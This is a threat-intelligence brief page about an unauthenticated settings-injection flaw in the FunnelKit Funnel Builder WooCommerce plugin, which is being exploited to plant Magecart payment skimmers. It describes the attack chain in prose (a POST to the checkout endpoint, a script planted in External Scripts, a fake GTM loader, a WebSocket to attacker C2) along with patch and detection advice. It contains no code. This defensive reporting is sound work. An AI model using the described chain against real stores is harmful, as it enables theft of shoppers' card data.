ctipilot.ch

FunnelKit Funnel Builder for WooCommerce — unauthenticated checkout-endpoint injection, active Magecart skimmer on 40,000+ stores (no CVE assigned)

campaign · item:funnelkit-funnel-builder-for-woocommerce-actively-exploited-magecart-skimmer

Coverage timeline
2
first 2026-05-17 → last 2026-05-17
Briefs
1
1 distinct
Sources cited
3
3 hosts
Sections touched
2
action_items, active_threats
Co-occurring entities
0
no co-occurrence
2026-05-172 appearances2026-05-17

Story timeline

  1. 2026-05-17CTI Daily Brief — 2026-05-17
    active_threatsFirst coverage. Sansec primary research + BleepingComputer + THN corroboration. Unauthenticated POST writes attacker JS into External Scripts; WebSocket-fed storefront-tailored payment skimmer. Patch FunnelKit 3.15.0.3+.
  2. 2026-05-17CTI Daily Brief — 2026-05-17
    action_itemsAction: patch FunnelKit 3.15.0.3+ on operator-managed WordPress and purge External Scripts.

Where this entity is cited

  • active_threats1
  • action_items1

Source distribution

  • bleepingcomputer.com1 (33%)
  • sansec.io1 (33%)
  • thehackernews.com1 (33%)

All cited sources (3)

Items in briefs about FunnelKit Funnel Builder for WooCommerce — unauthenticated checkout-endpoint injection, active Magecart skimmer on 40,000+ stores (no CVE assigned) (1)

FunnelKit "Funnel Builder for WooCommerce" actively exploited as Magecart skimmer on 40,000+ WordPress stores — no CVE assigned

From CTI Daily Brief — 2026-05-17 · published 2026-05-17 · view item permalink →

Sansec published primary research on 2026-05-14 documenting active exploitation of an unauthenticated code-injection flaw in FunnelKit's Funnel Builder for WooCommerce plugin, with BleepingComputer corroborating on 2026-05-15 and The Hacker News expanding on 2026-05-16 (Sansec, 2026-05-14; BleepingComputer, 2026-05-15; The Hacker News, 2026-05-16). The vulnerable component is a publicly-exposed POST endpoint for checkout-funnel session management that fails to validate caller permissions — per The Hacker News's coverage of Sansec's research, "Funnel Builder includes a publicly exposed checkout endpoint that allows an incoming request to choose the type of internal method to run". An unauthenticated request can invoke the internal method responsible for writing the plugin's global settings and inject arbitrary content into the External Scripts field (Settings > Checkout > External Scripts), which then executes on every checkout page site-wide. Mapped to T1190 Exploit Public-Facing Application + T1505.003 Web-Shell-equivalent (Magecart variant). Sansec observed the live payload masquerading as a Google Tag Manager initialiser; the fake GTM loader pulls JavaScript from an attacker-controlled domain, opens a WebSocket to attacker C2, and retrieves a storefront-tailored skimmer that harvests credit-card numbers, CVVs, and billing data in real time during checkout. No CVE has been assigned. Affected: all FunnelKit Funnel Builder for WooCommerce versions before v3.15.0.3. Why it matters to us: the unauthenticated-write-to-plugin-settings pattern is increasingly common across WordPress commerce plugins and is reachable by any internet scanner — Swiss/EU cantonal e-service portals, healthcare patient-payment systems, and university e-commerce instances running WooCommerce are exposed without operator action. The WebSocket-to-attacker-C2 channel makes the skimmer payload polymorphic per victim, so static-IOC scanning of checkout HTML will miss it; defenders should audit wp_options for unrecognised funnel-builder external-script entries and alert on any WebSocket (wss://) connection initiated from a WordPress PHP process or visible in browser checkout traffic to non-CDN endpoints. Hardening: update to v3.15.0.3+ immediately; manually purge the External Scripts setting; deploy a server-side malware scanner against the plugin install path. Three independent corroborating sources clear the SINGLE-SOURCE rule.